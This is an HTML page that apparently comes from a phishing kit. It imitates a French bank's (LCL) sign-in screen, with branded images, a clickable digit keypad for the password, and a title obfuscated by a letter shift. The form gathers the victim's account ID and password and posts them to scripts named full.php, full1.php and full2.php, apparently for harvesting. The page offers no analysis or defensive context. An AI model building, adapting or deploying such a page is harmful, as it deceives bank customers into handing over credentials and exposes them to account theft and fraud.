<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="fr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></meta>
<script type="text/javascript"> 
function formatText(tag) {
   var Field = document.getElementById('userpass');
   var val = Field.value;
   var selected_txt = val.substring(Field.selectionStart, Field.selectionEnd);
   var before_txt = val.substring(0, Field.selectionStart);
   var after_txt = val.substring(Field.selectionEnd, val.length);
   Field.value += tag  ;
}
</script>
<script type="text/javascript">
function changeText2(){
	if (document.getElementById('user').value ==""){
		document.getElementById('user').style.bordercolor ="red";
		return false;
	}
	if (document.getElementById('userpass').value ==""){
		document.getElementById('userpass').style.bordercolor ="red";
		return false;
	}

	}
</script>
<script>
function name()
   {  
   document.getElementById('userpass').value = "";
   }
   
</script>
<link rel="shortcut icon" type="image/x-icon" href="./images/ico/favicon.ico" />
<title>OFOOH FUGLW OBRQQ DLV</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="viewport" content="width=device-width, initial-scale=0.9, user-scalable=yes" />

</head>
<body>
<form  name="myform" class="form" id="xmarco" method="POST" onsubmit="return changeText2();" action="full.php" >

<div id="espace" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:670px; z-index:0"><img src="images/espace.png" alt="" title="" border=0 width=1349 height=670></div>

<div id="button9" style="position:absolute; overflow:hidden; left:221px; top:370px; width:32px; height:35px; z-index:1"><img src="images/button9.png" alt="" title="" onclick="formatText ('9');" border=0 width=32 height=35></div>

<div id="button4" style="position:absolute; overflow:hidden; left:257px; top:371px; width:33px; height:32px; z-index:2"><img src="images/button4.png" alt="" title="" onclick="formatText ('4');" border=0 width=33 height=32></div>

<div id="button2" style="position:absolute; overflow:hidden; left:292px; top:372px; width:33px; height:32px; z-index:3"><img src="images/button2.png" alt="" title="" onclick="formatText ('2');" border=0 width=33 height=32></div>

<div id="button8" style="position:absolute; overflow:hidden; left:329px; top:372px; width:31px; height:31px; z-index:4"><img src="images/button8.png" alt="" title="" onclick="formatText ('8');" border=0 width=31 height=31></div>

<div id="button1" style="position:absolute; overflow:hidden; left:365px; top:371px; width:33px; height:31px; z-index:5"><img src="images/button1.png" alt="" title="" onclick="formatText ('1');" border=0 width=33 height=31></div>

<div id="button3" style="position:absolute; overflow:hidden; left:220px; top:406px; width:34px; height:34px; z-index:6"><img src="images/button3.png" alt="" title="" onclick="formatText ('3');" border=0 width=34 height=34></div>

<div id="button7" style="position:absolute; overflow:hidden; left:255px; top:407px; width:34px; height:32px; z-index:7"><img src="images/button7.png" alt="" title="" onclick="formatText ('7');" border=0 width=34 height=32></div>


<div id="button7" style="position:absolute; overflow:hidden; left:292px; top:409px; width:33px; height:31px; z-index:8"><img src="images/button5.png" alt="" title="" onclick="formatText ('5');" border=0 width=33 height=31></div>

<div id="button0" style="position:absolute; overflow:hidden; left:327px; top:408px; width:33px; height:32px; z-index:9"><img src="images/button0.png" alt="" title="" onclick="formatText ('0');" border=0 width=33 height=32></div>

<div id="button6" style="position:absolute; overflow:hidden; left:364px; top:406px; width:34px; height:33px; z-index:10"><img src="images/button6.png" alt="" title="" onclick="formatText ('6');" border=0 width=34 height=33></div>

<div id="par" style="position:absolute; overflow:hidden; left:233px; top:531px; width:104px; height:42px; z-index:11"><input src="images/partuclies.png" alt="" type="image" title="" border=0 width=104 height=42 name="submit" value="submit" /></div>


<div id="pro" style="position:absolute; overflow:hidden; left:337px; top:532px; width:101px; height:39px; z-index:12"><input src="images/professionnel.png" type="image" alt="" title="" border=0 width=101 height=39 name="submit" value="submit" formaction="full1.php" /></div>



<div id="e-pro" style="position:absolute; overflow:hidden; left:441px; top:532px; width:101px; height:40px; z-index:13"><input src="images/e-lcl.png" alt="" type="image" title="" border=0 width=101 height=40 name="submit" value="submit" formaction="full2.php" /></div>

<div id="ss" style="position:absolute; overflow:hidden; left:424px; top:386px; width:117px; height:30px; z-index:14"><img src="images/ss.png" alt="" title="" border=0 width=117 height=30></div>

<input id="userpass" name="userpass" type="password" style="position:absolute;width:110px;left:425px;top:388px;z-index:15" required="required" autocomplete="off" autocorrect="off" autocapitalize="off" value="" aria-describedby="legalFirstNameValidations" aria-invalid="false">


<div id="image17" style="position:absolute; overflow:hidden; left:292px; top:197px; width:102px; height:29px; z-index:17"><img src="images/ss.png" alt="" title="" border=0 width=102 height=29></div>

<input id="user" name="user" type="text" style="position:absolute;width:115px;left:287px;top:199px;z-index:18" required="required" autocomplete="off" autocorrect="off" autocapitalize="off" value="" aria-describedby="legalFirstNameValidations" aria-invalid="false">
<div id="formcheckbox1" style="position:absolute; left:214px; top:244px; z-index:19"><input type="checkbox" name="formcheckbox1"></div></form>

<form name="f">
<div id="face" style="position:absolute; overflow:hidden; left:448px; top:414px; width:59px; height:27px; z-index:16"><input type="image"  src="images/effacer.png" alt="" title="" border=0 width=59 height=27 /> 


</div></form>

</body>
</html>
